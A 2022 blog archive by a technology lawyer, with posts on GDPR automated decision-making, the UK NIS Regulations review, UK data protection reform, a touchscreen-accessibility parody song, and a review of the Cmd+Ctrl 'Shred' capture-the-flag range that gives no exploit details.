Mastodon Kuan0: 2022

Sunday 16 October 2022

Automated Decision Making (ADM) & GDPR - Flowchart

ADM under GDPR - I produced this flowchart after noticing that my Imperial AI MSc students were struggling to parse Art.22. Admittedly it's been termed the worst-drafted of all GDPR provisions, rightly, by someone I used to work with, who knows who she is :) I hope it will be useful, and as always all comments are welcome!

Saturday 9 July 2022

UK NIS Regulations: enforcement, & future

For both OESs and DSPs the UK NIS Regulations have barely been enforced, but change is coming,  including to bring MSPs within scope. (OESs are operators of essential services, basically critical infrastructure service providers, while DSPs are "digital service providers": cloud computing service providers, online marketplaces or online search engines only, not other providers of digital services in the broad sense). 

The Second Post-Implementation Review of the Network and Information Systems Regulations 2018 (PDF), 4 July 2022, revealed this and other interesting information:

  1. NIS incident reporting hasn't actually been happening: “…the system does not appear to be working. As of this review, competent authorities have received little-to-no reports, despite other sources of information, such as the Breaches Survey, indicating a prevalence of incidents within the wider economy and society.”

  2. NIS enforcement has been minimal; no NIS fines (penalty notices) have been imposed so far: 
    1. Only 2 competent authorities have enforced to date, "which raises the question of "is the enforcement regime appropriate?" But, “NCSC has also been informed of one very successful instance of a competent authority carrying out enforcement, which had very positive outcomes, suggesting that the enforcement regime may be appropriate." 
      1. Note: it's unclear if the UK ICO, which regulates DSPs under the NIS Regulations, was one of thise two authorities.
    2. “…there is evidence from competent authorities to suggest that there are cases where enforcement activities were merited but no action was taken. The use of enforcement tools overall, is much lower than the reported need and so far competent authorities appear to have been less inclined to make use of their regulatory powers." Why, and why not? The reasons are not stated.
    3. "There is also a reported concern from regulators that the grounds for enforcement (either via enforcement notices or penalty notices) is not clear enough”…
    4. “NIS competent authorities... have additionally reported being very restrictive with their regulatory powers, relying more on regular engagements, inspections, and information notices rather than any binding provisions of the regulations, such as enforcement notices, civil proceedings, or penalty notices.”
    5. "Of those who felt the enforcement regime wasn't proportionate, 44% gave other reasons including there is no clear link between the fine levied and the actions that operator of essential services took prior to the incident and the fact that fines result in double jeopardy as there is already a cost relating to a cyber breach."
      1. Note: it's interesting that the double jeopardy cited was not the possibility of fines under both GDPR and NIS, which is the key double jeopardy risk in my view (to be addressed in the EU's NIS 2 Directive). The breach costs point is, of course, also relevant to GDPR fines too, but cited only sometimes (in conjunction with remediation costs) in GDPR supervisory authority decisions.
    6. The only relevant DSPs who indicated the enforcement regime was not proportionate to the risk of disruption reported feeling that the Regulations were incorrectly applied to DSP organisations in general. (This I agree with, see later below.)
    7. DCMS will aim to collect annual data from the competent authorities e.g. the number of incidents per year, the number of independent audits of the Cyber Assessment Framework, the number of improvement plans as a result of the Cyber Assessment Framework, the number of information notices issued by the competent authorities, the number and nature of enforcement notices issued by competent authorities, and the number of organisations regulated by sector and also the number of SMEs regulated by sector.

  3. NIS Regs' Cyber Assessment Framework: this has allowed experts in competent authorities to review organisations' cyber security arrangements and ensure improvements are made. 67 known operators have received improvement plans (including updating legacy systems and software to reduce vulnerabilities), highlighting Regulations' role in improving cyber security. 
    1. Note: the reference was only to "operators". This suggests no DSPs were asked to make any improvements to their cybersecurity under NIS.

  4. NIS Regs generally: effective to drive good cyber security behaviours; "...strong indication that without NIS, cyber security improvements across essential services in the UK would proceed at a much slower pace. ...added benefit of covering a large number of sectors, which is expected to address some of the inconsistencies of managing risks to networks and information systems across sectors...". But, areas of improvement remain, thought to be most appropriately tackled through regulatory intervention, to strengthen and future-proof the regulatory framework.
    1. Other regulations or standards mentioned as drivers for improvements in cyber security included: UK General Data Protection Regulations (GDPR) (13 or 86% of relevant digital service providers, 68 or 78% of operators of essential services); ISO27001 (28% of operators of essential services); Cyber Essentials and Cyber Essentials Plus (11% of operators of essential services); as well as other industry standards (33% of operators of essential services).

  5. Areas needing improvement, and future plans: Then-Minister Lopez's associated statement to Parliament on 4 July noted that recommended changes to the NIS Regs were included in the Department for Digital, Culture, Media & Sport's Jan 2022 consultation, Proposal for legislation to improve the UK’s cyber resilience (summarised in my Linkedin post). The outcome of that consultation is to be published "later this year", i.e. later in 2022. Recent UK political events, including her resignation on 6 July, may of course result in delays to the initially-planned timescale. The key areas are:

    1. DSP registration and guidance: 54% of responding DSPs stated it was not easy to identify that their organisations are in scope (this deters registration, and ICO won't be aware of their activities to advise them!).
      1. "Further work is required to ensure that the guidance makes it easy to identify whether firms are in or out of scope of the Regulations and to ensure that organisations that need to be included in the regulations are designated."
      2. "Registration of digital service providers cannot be left to digital service providers alone... The Government will continue to support the ICO in the work it is already carrying out to identify firms that should be under the Regulations and support them in notifying those organisations of their responsibilities. Both the government and the Information Commissioner, should consider ways to increase awareness of the NIS Regulations with all potential digital service providers." The government should consider options to provide the Information Commissioner with increased information-seeking powers (similar to existing ones available to competent authorities of operators of essential services) to ascertain whether an organisation qualifies as a relevant DSP under the NIS Regulations.

    2. Ensuring the right sectors are caught: managed service providers (MSPs) are not caught currently, but under the Jan 22 consultation they will be. (For other subsectors discussed e.g. BPO, SIEM, analytics & AI, see my Linkedin post, but it seems "While this Post-Implementation Review has not identified any other sectors that need to be included at this time, it has underlined a need for the government to maintain the powers to make such additions in the future.")

    3. Supply chain security: OESs can't monitor supply chains due to lack of supplier cooperation and lack of resources. Action is needed to increase operators’ ability to manage security risks arising from supply chains, particularly suppliers critical to provision of essential services.
      1. Proposed power to designate critical dependencies to identify, impose duties, and then regulate certain supply chain organisations that present systemic risks to OESs, due to their market concentration, reliance on those services, or other factors.
        1. Comment: could IaaS/PaaS, perhaps even some SaaS providers, be caught both as DSP and as critical dependency? - highest common denominator of compliance required there. Also, could IaaS/PaaS providers that are critical enough, simply be designated as OESs themselves (legislative rules permitting)?
      2. DCMS will consider options such as amending guidance to tackle supply chain security concerns, including using standards and certification, such as Cyber Essentials and Cyber Essentials +, to address this issue. But cross-government consultation is needed.
      3. Note: see also the Government response to the call for views on supply chain cyber security, Nov 2021.

    4. Capability & capacity of OESs, DSPS, competent authorities: lack of finance/funding or of general resources, more variable among authorities particularly lack of cyber regulator specific training or centralised NIS training (as opposed to GDPR training). Competent authorities also need more resources for effective enforcement. On authorities' resources:
      1. DCMS will "commit to persuading those departments to ensure that they meet their legal obligations to fund their NIS oversight. For these, plus those regulators that are not central government departments, DCMS aims to ensure that competent authorities are able to recover the costs of regulation from those being regulated, in line with government policy."
      2. Additional ways to improve resource-efficiency will be considered, e.g. promoting collaboration across authorities and with non-NIS authorities such as banking and financial services regulators (for designation of critical dependencies), exploring existing frameworks like CBEST and TBEST to test assumptions and highlight areas for further development.

    5. Incident reporting: thresholds (in statutory guidance) are too high, and base criteria of a reportable incident is too narrow (disruption to the service, cf. impact on NIS) to capture the most high risk incidents risks. To ensure that the right incidents are captured:
      1. Authorities should review reporting thresholds and lower if necessary.
      2. OESs and DSPs will be required to report all incidents that have a material impact on the confidentiality, integrity, and availability of NIS [note: the well known CIA triad], and [note: I think "or" is intended here?] that have a potential impact on service continuity.

    6. Enforcement: DCMS needs to conduct work to assess why the enforcement regime is not being utilised where it is merited.

    7. Consistency and more robust oversight: greater consistency in regulatory implementation across sectors is required, alongside creation of performance metrics to better measure the impact and effectiveness of the Regulations.
      1. DCMS should issue revised and updated guidance to competent authorities, setting out the requirement for a common approach to assessment and performance indicators; explore ways to make such guidance more binding on authorities; and establish a process by which competent authorities report against performance indicators and are held accountable for their performance (indicators could be linked to the delivery of the National Cyber Strategy and its performance framework). 
Note also the related consultation on Data storage and processing infrastructure security and resilience - call for views (press release), including data centre infrastructure, cloud platform infrastructure and MSP infrastructure, which expires at the end of Sunday 24 July 2022.

The next UK NIS Regulations review isn't due for another 5 years.


Below are my personal views only, but they're based on my practical experience of advising clients on the UK NIS Regulations and EU NIS Directive: both their legal and technical/security teams.
  • Incident reporting:
    • "There is a lot of uncertainty around the incident response, and which incidents need to be reported...". In my view, this uncertainty is a contributing factor, and guidance is sorely needed, alongside the planned steps mentioned above regarding lowering reporting thresholds and requiring reporting of incidents materially affecting NIS CIA even if not affecting the service.
    • However, there's a risk of a tsunami of reports that regulators may not be able to cope with, if every incident "materially" impacting C, I or A has to be notified. It's important to bear this factor in mind when setting the reporting test/thresholds. Again, guidance on "materiality" will be vital.
  • Awareness, scope, DSPs and non-registration: I hope the government will take the opportunity, post-Brexit, to reconsider the scope of the NIS Regulations beyond just bringing MSPs into scope. In particular, please consider whether and to what extent SaaS providers should be caught by the NIS Regulations.
    • The NIS Regulations were binding from 10 May 2018. Guess what else there was in May 2018? Yep, the GDPR. No surprises then that most organisations focused their resources on GDPR rather than NIS compliance, especially with the huge publicity about GDPR fines and hardly anything being said about NIS.
    • It's understandable that IaaS/PaaS providers should be subject to the Regulations as DSPs, because many organisations build their own technology infrastructure or customer-facing services on top of those cloud services. I.e., many organisations create their own SaaS services based on third party IaaS/PaaS services, which do constitute technology infrastructure-type services.
    • However, automatically and unthinkingly copying out the NIST definition of cloud computing is not the right approach here. Applying NIS laws to SaaS is like applying certain laws to "all websites" when they should actually apply to "website hosting platforms/services". SaaS involves the provision of specific applications or services to end users (like a word processing application online, instead of via an application installed on a local computer). Those applications/services can vary hugely in their scope and purpose. The applicability of NIS requirements ought to depend on the specific type of application/service and its importance to the economy or society (e.g. is the service critical to the provision of an OES's essential service?) - and not just because of its general nature as SaaS. Currently, all SaaS services are technically caught, whether they're used for bill payments or as a forum for pet lovers to discuss their animals. To me, that doesn't seem to make sense.
    • As I've previously pointed out, SaaS providers don't always register with the ICO for various reasons.
      • Registering puts their heads firmly above the parapet for possible enforcement. Especially as, since Jan 2021, the top £17m tier of fines could be imposed based on serious service outages alone, whereas previously the top tier only applied if the service was important to the economy. If I provided a SaaS service for pet lovers' discussions, which no one could think would harm the economy or society if it went down, I wouldn't want to register and make my service known to the ICO either.
      • Saying that SaaS services are caught "only to the extent that they provide a scalable and elastic pool of resources to the customer" just parrots the definition without providing any useful guidance. All cloud services are, by definition, meant to be scalable and elastic. They're not infinitely scalable or elastic, of course; even IaaS/PaaS services impose practical commercial limits on customers' usage, so SaaS services' lack of infinite scalability/elasticity should be a non-point too. But some SaaS providers do argue they're not caught because their service doesn't enable access to a "scalable" and "flexible" pool of shareable computing resources. I have some sympathy here, not because the services really aren't scalable/flexible, but because (as above), given the legislative objective of NIS laws, I feel that it's simply not sensible to try to catch all SaaS services just because they're SaaS, regardless of the exact nature of their services or customers served. Business models are increasingly moving to SaaS, away from software licensing: but there's no legal requirement to have security measures or report vulnerabilities or security issues affecting all software applications regardless of their nature (although many might think that would be sensible). And I've always thought it odd that flexible/scalable services are subject to NIS, when inflexible, non-scalable "classic" hosting platforms are not, even though with the latter their customers are more at risk from availability issues (due to their inflexibility and non-scalability!). Surely it should be the other way round?
      • And making all SaaS services register is akin to making all software application manufacturers/distributors register their software. The ICO receives fees from controllers who register for data protection purposes, so there's a benefit to the ICO from that registration. But is the benefit of finding out about all online software applications of whatever type or importance worth the administration and other costs?
      • Would introducing a fine for non-registration help? I don't think so, because of the underlying issue I've emphasised regarding the inappropriateness and disproportionality of bringing all SaaS services within scope regardless of their importance to society or the economy (and see later below).
      • In my experience, SaaS providers may register if they provide important services to operators. Otherwise, they tend to keep their heads down, and I don't blame them.
      • The lack of publicly-reported enforcement of the Regulations is another reason for relative lack of awareness of NIS. 
  • Capability and enforcement
    • Certainly as regards DSPs, I've found that many ICO staff aren't familiar with NIS and need NIS training as well as more resources for NIS, e.g. those staffing the helpline number given on the ICO's NIS webpage. As flagged above, some DSPs consider the Regulations were incorrectly applied to DSPs in general, and I agree, possibly because of awareness  and/or knowledge issues.
    • The reluctance of many SaaS providers to register, never mind report incidents, is fuelled by the factors I've outlined above, and fear of being subject to the maximum possible fine even though their service may be of minor importance to society or the economy. If they have to bear the costs of ICO investigations too, as is planned, that may drive even more SaaS providers to decide not to register. 
    • The bigger risks for non-registering DSPs are monetary penalties for not reporting incidents when they should have, and/or not having the appropriate security measures in place. If they haven't registered and haven't notified incidents, that of course reduces those risks, because the ICO won't know about them! The main risk then is if they report a personal data breach under GDPR and the ICO says, "Aha! We will fine you under NIS too, because you should have reported the incident under NIS!". But, this depends on the ICO's NIS and GDPR enforcement divisions being sufficiently joined up and also trained up (again, the skills/knowledge issue flagged earlier).
  • Summary: personally, I would recommend:
    • Reconsidering the extent to which SaaS providers should be in scope under NIS, if at all.  For example, consider introducing specific thresholds or criteria for SaaS providers to be in scope (Obviously if they are critical suppliers to OESs, or OESs themselves, they should be caught under those proposed changes and be exposed to possible designation as OESs, but that's a separate matter.)
    • Reconsidering the extent to which SaaS providers should be subject to the different tiers of NIS monetary penalties or other enforcement, if at all (with the same caveat). Again, consider if different types/tiers of fines or other enforcement should be applicable to SaaS providers or indeed DSPs that aren't OESs or critical suppliers.
    • These would help save the ICO's resources too, so they can be directed towards IaaS/PaaS and truly important SaaS providers.
    • If less radical changes are to be made, provide much clearer guidance on if/when SaaS providers will be caught by the Regulations and therefore need to register with the ICO.
    • Making publicly available the annual data DCMS aims to collect from regulators, particularly enforcement information and levels of fines imposed. This would help to raise awareness and incentivise compliance.
    • Requiring the ICO and other regulators to publish the full text of their NIS enforcement and monetary penalty etc notices, but redacted as necessary (including as to OES/DSP names), ideally also listing and linking to them on a centrally-maintained webpage of NIS enforcement action. That would also help raise awareness and incentivise compliance.

Saturday 25 June 2022

"Old fingers": digital exclusion, accessibility

Song with serious message: tablets, smartphones & other touchscreens have built-in accessibility & usability issues. This is a real problem as we'll all get old eventually (& it's not just the elderly who may suffer from "zombie fingers"): see research; some user solutions are possible, but designing for lower skin conductivity would be ideal.

The lyrics below are original to me, but I don't provide any video of them being sung or indeed any backing music, to avoid any copyright issues (despite the parody exception). This seems to be the official YouTube video, so James Bond/Shirley Bassey fans please feel free to sing along!

Old fingers
Touchscreens weren’t designed for skin that’s dry
I want to cry!
Why?! my old fingers
Can’t control the same touchscreen anymore
Like once before?
And I press and I swipe all in vain
And I curse and I try it again
But a thousand times, won’t make a difference
It’s their **** design, conceived for
Young fingers
Supple skin, conducting the signals in
With no chagrin
You can press, you can swipe all in vain
You can curse and just try it again
Try a thousand times, won’t make a difference
It’s their **** design that beats my
Old fingers
Gaming gloves, or wet them, is what I’m told
Too bad you’re old
Can’t stop getting old
Getting old
We’ll be old
Who cares ‘bout the old
You'll be old
Just be old!

Friday 17 June 2022

UK data protection reform post-Brexit: key points summary

The UK government’s response to its data protection reform consultation is out (press release 17 June 2022).

Certain proposals will proceed under the Data Reform Bill announced in the 10 May 2022 Queen’s Speech (more info). Others won’t, while still others are to be be considered further. The devil’s always in the detail, of course, so when the Bill’s text is available the proposed changes will be clearer  – it's still unknown exactly when it’s to be published (updated: TechUK says the Bill will be laid "this summer to undergo several rounds of amendments before it is formally passed into legislation". So, presumably June/July before the August summer holidays).

Some highlights below.


  1. To use Convention 108+ test para19: “Data is to be considered as anonymous only as long as it is impossible to re-identify the data subject or if such re-identification would require unreasonable time, effort or resources, taking into consideration the available technology at the time of the processing and technological developments. Data that appears to be anonymous because it is not accompanied by any obvious identifying element may, nevertheless in particular cases (not requiring unreasonable time, effort or resources), permit the identification of an individual. This is the case, for example, where it is possible for the controller or any person to identify the individual through the combination of different types of data, such as physical, physiological, genetic, economic, or social data (combination of data on the age, sex, occupation, geolocation, family status, etc.). Where this is the case, the data may not be considered anonymous and is covered by the provisions of the Convention”. 
  2. The test for anonymisation will be relative, i.e. will the individual remain identifiable by that controller, cf. a third party?

Artificial intelligence (AI) & machine learning (ML), and ADM

  1. Anti-discrimination - the UK DPA sch1 para8 exemption allowing processing of special category data and criminal offence-related data for equality of opportunity or treatment will be expanded to allow bias monitoring, detection and correction in AI systems.
  2. Fairness - the government will consider the role of UK GDPR “fairness” in wider AI governance in its forthcoming AI White Paper, but will not legislate here.
  3. Art.22 automated decision-making (ADM) - will be retained, but with clarified limits & scope, including ADM as a right to specific safeguards, rather than a general prohibition on solely automated decision-making. The approach to ADM will be aligned with the broader approach to governing AI-powered ADM, which will be addressed as part of the upcoming UK White Paper on AI governance.
  4. Explainability and intelligibility of AI-powered ADM, including the role of DP legislation in that context, will be considered in the White Paper on AI governance.
  5. See also above on purpose limitation.


  1. Organisations must have a privacy management programme.
  2. No need for DPO, but must designate a suitable individual to oversee data protection compliance
  3. No more data protection impact assessments (DPIAs), or requirement for records of processing activities (ROPAs) as such. 
  4. Controllers must have simple, transparent complaint-handling processes for data subjects (but retaining clear pathway to complain to the ICO).

Legal basis - legitimate interests

  1. No balancing test will be needed for a limited number of carefully-defined processing activities in the clear public interest based on legitimate interests, likely to include processing activities undertaken by controllers to prevent crime, report safeguarding concerns or that are necessary for other important reasons of public interest (the government will consider if any additional safeguards are needed for children’s data). Hopefully this should “encourage organisations to make the authorities aware of individuals who are at risk without delay”, including children and other vulnerable groups with protected characteristics. However, core principles like lawfulness, fairness & transparency, and further conditions for processing special category data, etc., would of course continue to apply.
  2. Power to update the list of activities, subject to Parliamentary scrutiny.

Special category data, criminal offence-related data

The UK DPA 2018 sch1 part 2 exemptions for processing in the substantial public interest could be expanded to add certain activities, but “substantial public interest” will not be defined specifically.

Purpose limitation

  1. Further processing or reuse by the same controller for incompatible purposes will be permitted “when based on a law that safeguards important public interest”, with “greater clarification on the rules and permissions of data re-use and the need for greater transparency”. 
  2. On consent-based processsing, “further processing cannot take place when the original legal basis is consent other than in very limited circumstances”. We’ll have to wait to see what those new circumstances will be.
  3. Distinctions between further processing and new processing by a different controller to be clarified.


  1. Adequacy decisions - a risk-based approach will be taken; judicial or administrative redress are both acceptable. There will be ongoing review, cf 4-yr review of adequacy decisions.
  2. The Secretary of State can recognise alternative transfer mechanisms (ATMs). 
  3. (But no repetitive derogations or reverse transfers etc.)


  1. No nominal fee to be introduced.
  2. No cost ceiling, but controllers can refuse to deal with DSARs that are “vexatious or excessive” (cf. the current “manifestly unfounded or excessive”).


  1. No new lawful basis for research, but various changes will be made to assist and promote research.
  2. E.g. a “scientific research” definition (hopefully making crystal clear the position on commercial scientific research, and what's research in the "public interest"?); and clarifying that broad consent is possible and can be relied on.
  3. Privacy notices – the UK GDPR's Article 14(5)(b) “disproportionate effort” exemption will be replicated, but only for research purposes, to allow personal data being used for a research purpose differing from the original purpose to be exempt from re-providing information under Article 13(3) - but without exempting controllers who obtain personal data directly from data subjects from providing the required Article 13(1) & (2) information to them on collection. “Disproportionate effort” to be clarified by bringing in the GDPR's Rec.62 language into the operative text.

ePrivacy under PECR

  1. Fines - to be increased to GDPR levels.
  2. ICO powers - to include assessment notices etc.
  3. Cookies and similar technologies (i.e. mobile apps, smart devices too)
    1. Analytics will be considered “strictly necessary”.
    2. Consent to be unnecessary in more situations: "a small number of other non-intrusive purposes" (e.g. website fault detection?), "where the controller can demonstrate legitimate interest for processing the data".
    3. Websites must respect users’ browser preferences; the UK will move to no cookies banners for UK residents and an opt-out model for cookies once preferences management technology is widely available.
  4. Direct marketing
    1. Soft opt-in to be extended to political parties and non-commercial organisations like NGOs/charities. 
  5. Nuisance phone calls e.g. automated telephone marketing 
    1. The ICO will be able to take enforcement action against organisations based on the number of calls generated (cf. only the number that are connected, currently)
    2. Communications service providers must report to the ICO “suspicious levels of traffic on their networks”.


  1. New duties (e.g. to uphold data rights and to encourage trustworthy and responsible data use, have regard to economic growth and innovation, competition issues and public safety, to consult with relevant regulators and any other relevant bodies).
  2. Structural changes e.g. independent Board and Chief Executive.
  3. New powers for the DCMS Secretary of State, e.g. to prepare a statement of strategic priorities which the ICO must respond to; to approve statutory codes of practice and statutory guidance ahead of laying them in Parliament.
  4. Legislative criteria for a more risk-based proportionate approach to complaints - ICO discretion to decide when/how to investigate complaints, including discretion not to investigate vexatious complaints, and complaints where the complainant has not first attempted to resolve the issue with the relevant data controller. "This will empower the ICO to exercise its discretion with confidence."
  5. New ICO powers
    1. To issue technical report notices where fair and reasonable, having regard to alternative investigatory tools, relevant knowledge and expertise available to the controller or processor and the impact of the cost of producing the report.
    2. To compel witness interviews, without interfering with the right not to self-incriminate, rights to legal professional privilege and various procedural mechanisms to ensure proportionality & fairness of interview.
  6. Must provide organisations with the expected timeline at the start of all investigations.

Note: on ICO resources and funding, the ICO announced, on 14 June 2022, its agreement with its sponsor department the Department for Digital, Culture, Media & Sport (DCMS) and with the Treasury (HMT) that the ICO will now able to retain some of the funds paid as a result of its civil monetary penalties i.e. fines to cover pre-agreed, specific and externally audited litigation costs. (Previously, all fines money went to the UK government’s central Consolidated Fund.)

Sunday 10 April 2022

Security training - review of Security Innovation's Cmd+Ctrl Shred cyber range & security training

GDPR supervisory authorities (SAs) emphasise data protection training (e.g. the UK Information Commissioner's personal data breach notification form asks, "Had the staff member involved in this breach received data protection training in the last two years?", and "Please describe the data protection training you provide, including an outline of training content and frequency").

What about security? Security of personal data is of course important under GDPR, and organisations can be fined for not having appropriate security measures in place. While security training for developers is not specifically mentioned in GDPR as such, developers do also need training on application security issues that can lead to breaches of websites, online services and any databases or other data storage behind them (including personal data in systems). Most IT staff, developers and otherwise, are not necessarily cyber security (or even security) experts, and must be educated on what to look for and how to address, at least, the most common key security issues.

Many online training courses on cybersecurity for developers are now available. There are also "cyber ranges" offering users deliberately vulnerable systems, websites or online applications that users can attack and seek to exploit, to learn how hackers think and the kinds of the actions they take, and therefore be able to defend against them better. 

As part of OWASP London CTF 2021, in Nov 2021 Security Innovation generously offered participants free access for a month to a fake e-commerce website "Shred Skateboards" on its CMD+Ctrl CTF (Capture the Flag) web application cyber range, and for 6 weeks to its Bootcamp Learning Path, a self-paced online training course incorporating 32 selected courses from its full catalog of training courses.

This blog reviews the Shred range, then the online training courses. These cover some of the issues referenced in the recently-finalised European Data Protection Board (EDPB) Guidelines 01/2021 on Examples regarding Personal Data Breach Notification, as those Guidelines include some recommended security measures as well as breach notification, and also mention OWASP for secure web application development. 

Cmd+Ctrl Ranges and Shred

Cmd+Ctrl's ranges are generally available only to paying organisations to train their staff (but not to paying individuals, sadly. Missed trick there, as I think individuals wanting to improve their ethical hacking skills would pay a reasonable fee or sub for access). People who signed up for the event were however given free access to Shred for a month. Shred is meant to be one of the easy ranges.

The Cmd+Ctrl login page provides some sensible disclaimers and warnings: 

After logging in, you need to click on the relevant range's name and wait a few minutes for it to start up (each user gets their own virtual machines I suspect on Amazon Web Services), as a real website available on the Internet with its own URL (hence the exhortation not to enter sensitive information on the website - I would expand that to real names, real email addresses and basically any real personal data, because real hackers can also access that website as much as you can!).

Then, basically explore the website and try different things to find vulnerabilities e.g. click the links, register user accounts, try different URLs, enter different things into the search or login forms, etc. I won't share screenshots of Shred so as not to give anything away, but it emulates an online shop for skateboards and related accessories and pages, with user accounts that can store user details including payment cards, the ability to purchase gift cards, etc. Each machine is up for I believe 48 hours, and each time you start it, it may have a different URL and IP address. If things go badly wrong you may have to reset the database (which loses your changes e.g. a fake user you registered) or even do a full reset, but you're not penalised for that, the system retains the record of scores you achieved for previous exploits. 

When you successfully exploit a vulnerability, a banner slides in from the top of the webpage indicating what challenge was solved and how many points you gained for it. You can also see what broad types of other challenges remain unsolved. 

Via the My Stats link, you can see a Challenges page, which also gives similar broad information about the types of challenges remaining unsolved. Unfortunately, only Category information was provided regarding unsolved challenges (see the Category column of the Solved table shown below for examples). 

No detailed information about the exact nature of any challenge (i.e. the info under the Challenge column, such as "Unsafe File Upload" in the table above) was provided. It appeared only after you actually solved the challenge, whereupon it was listed in the Solved table (as well as the banner appearing). The "Get Hints" link was disabled for this event - but presumably hints are available in the paid versions of the ranges. However, Security Innovation provided a live online introduction on the first day of the CTF event, access to a one-page basic cheat sheet tutorial, with a guide to Burp Proxy for intercepting HTTP traffic, and weekly emails with some hints and links to helpful videos. A chat icon at the bottom right of every webpage allowed the user to ask questions of support staff. I tried to confine my range attempts to the afternoon/evening given that Cmd+Ctrl is US-based, but I was very impressed with how quickly responses were given to my chat queries, even though I was using the range as an unpaid user. The support staff did not give away any answers, but instead provided some hints, often very cryptic - I suspect similar to the tips that users for whom the Get Hints" link is enabled would receive. 

Under My Stats there was also a Report Card link giving detailed information about your performance, also in comparison to others who had attempted the range, including the maximum score reached. Challenges were again shown here, broken down by category and percentage solved. 

 As well as repeating the solved challenges table further down on this page, there's also a time-based view of the user's stats. As you'll see, I had a go over the first weekend, solving a few basic and easy challenges, then left it until I realised that I would lose access to Shred soon, so I made a concerted effort over the last few days though I ran out of energy with an hour or two to spare!


I was rather chuffed that, as a mere lawyer and not cybersecurity professional, I managed to complete 25 out of the 35 challenges and reach the rank of 7, out of 54 people who at least attempted Shred (in the screenshots below I've redacted names and handles other than common ones like Mark or David). I admit I have attended some pen testing training, one excellent 2-day course with renowned web security expert Troy Hunt (yes, I was very lucky), and one terrible week-long course with someone whose name should never be mentioned again (but at least the food was great). However, those courses were several years ago, and this is the first time that I've attempted a range or CTF event. (I've signed up for other services with some similarities, Hack the Box and RangeForce Community Edition, but I haven't had time to try them properly yet.)


Prerequisites for trying these ranges

You do need some prior knowledge, particularly about HTML and how URLs, query parameters and web forms work, HTTP, cookies, databases and SQL etc, and concepts like base64 encoding and hashes. You also have to know how to use tools like Chrome developer tools, which is built into Chrome, to edit Shred webpages' HTML. I'd not used those developer tools before tackling Shred, but searched for how (I didn't resort to Burp for Shred, myself). I probably have a better foundation than most tech lawyers as I have computing science degrees as well as the pen testing training, coupled with a deep and abiding interest in computing and security since my childhood days. So I'd strongly recommend that those without such a foundation should take the courses before attempting any ranges (the courses are covered in more detail below).


The range provided an excellent assortment of different vulnerabilities to try to exploit, most of the type that exist in real life (indeed, recently I spotted a common one on one site I shop from, when I mistyped my order number into its order tracking form!). The chat support staff were very prompt, although I couldn't figure out some of their hints.


Shred included 3 challenges (maybe more?) that involved the solving of certain puzzles (at least one of which scored quite a few points). However, I think the range would have been better if they had not been included, as you wouldn't find them on actual websites - they were simply puzzles to solve, not realistic website vulnerabilities. OK perhaps for some fun factor, not so much for learning about web vulnerabilities, particularly as access to the range is time-limited.

The biggest negative in my view is that no model answers are given at the end. If you haven't managed to solve some of the challenges, tough luck, they won't tell you how. A support person said they felt that these ranges could be devalued by "giving away too much", because customers pay to access its ranges. However, I think that view is misconceived.

It depends on how customers use these ranges internally. I believe they would be best used as hands-on training for tech staff (developers, security), but I can't see why previous users would give away the answers to colleagues or indeed people in other organisations, as it defeats the object of trying these ranges. If organisations required staff to achieve a minimum score on these ranges, then yes, that might incentivise "cheating" and disclosure of solutions. But it's not uncommon, and in fact often a good thing, to form teams to solve challenges together and share knowledge. For this and many other reasons, such a requirement would not make sense. And it would make no sense for one customer of Security Innovation to give the answers away to other customers, what would be the purpose of that?

Conversely, it would be very frustrating for someone who had paid to use the range to find out that they would not be told any outstanding answers at the end. If you haven't managed to teach yourself the solutions, you don't know what you don't know, how will you learn if they refuse to fill in the gaps? Security Innovation already impose a condition on the login page that users cannot post public write-ups or answer guides, which they could expand if they wish (though I don't think that's necessary or desirable).

In similar vein, I think they should at least give hints about the detailed challenges (e.g. "Unsafe file upload" as one challenge), not just categories of challenges. The cheat sheet mentioned a few types of vulnerabilities that I spent too many hours trying to find, and it was only on the last day or two before expiry that I asked on the chat, only to be told Shred didn't actually have those types of vulnerabilities! I appreciate Cmd+Ctrl doesn't want to give too much away, but knowing there's an unsafe file upload issue to try to exploit still doesn't tell you how to exploit it, and it would have saved me so much time particularly given that access to Shred was time-limited. Again, I think paying customers would appreciate more detailed hints so that they can be more targeted and productive in tackling the challenges during the limited time available (and perhaps "Get hints" would have done that, but access was disabled for this event).

Also, I'm not sure how time-limited access would be for the paid version, but organisations wanting to subscribe should of course check the details and ensure the time period is sufficient for their purposes, as staff also have to do their jobs! (I tried the range during my annual leave).

Final comments

I think it's definitely worth it for organisations to pay for their developers to try these ranges, subject to the negatives mentioned above (and see below for my review of the training courses). These ranges can be more interesting and fun for users, and certainly involve more active learning (looking into various issues in context as part of attempting to exploit those types of vulnerabilities), which research has shown improves understanding, absorption and retention. And of course, gamification is known to increase engagement. Attempting these ranges would help to consolidate knowledge gained during the security training. 

But, as mentioned above, I believe the best way would be to give staff enough time to tackle the ranges, over a reasonable period over which the relevant range is open. Don't make staff do this exercise during their weekends or leave, or require each person to reach a minimum score; instead, hold a debrief at the end of the period, for staff to discuss the exercise and share their thoughts (and hopefully receive the answers to challenges none of them could solve, so that they can learn what they didn't know). I appreciate that leaderboards and rankings can bring out the competitive streak and make some people try harder, but I believe team members need to cooperate with each other, and staff shouldn't be appraised based on their leaderboard ranking (or be required to reach a minimum score) - the joint debrief and "howto" at the end is, I feel, the most critical aspect to getting developer teams to work together better in future to reduce or hopefully eliminate vulnerabilities in their online applications.

Cmd+Ctrl offers a good variety of ranges with the stats and other features covered above, which seem very up to date in their scope: banking (two), HR portal, social media, mobile/IoT (Android fitness tracker), cryptocurrency exchange, products marketplace, and cloud. I wish I'd had the chance to try the cloud ones! In fact, there now seem to be 3 separate cloud-focused ranges: cloud infrastructure, cloud file storage, and what seems to be a cloud mailing list management app, i.e. both IaaS and SaaS. 


A range that actually allows the user to edit the application code to try to address each vulnerability, then test again for the vulnerability, would be great for developers!

Online training courses

Alongside access to Shred, for those who signed up to the Nov 2021 bootcamp, Security Innovation kindly offered access for 6 weeks to 32 online courses from its full catalog of training courses. I provide some comments on format and functionality first, then end with thoughts on the content.

I took the bootcamp courses, but the vast majority of them only after I'd finished the Shred range. The information in some of those courses would help with the Shred challenges, but not all of them, and they are aimed at developers, so to follow those courses you would also still need some prior computing and coding knowledge.

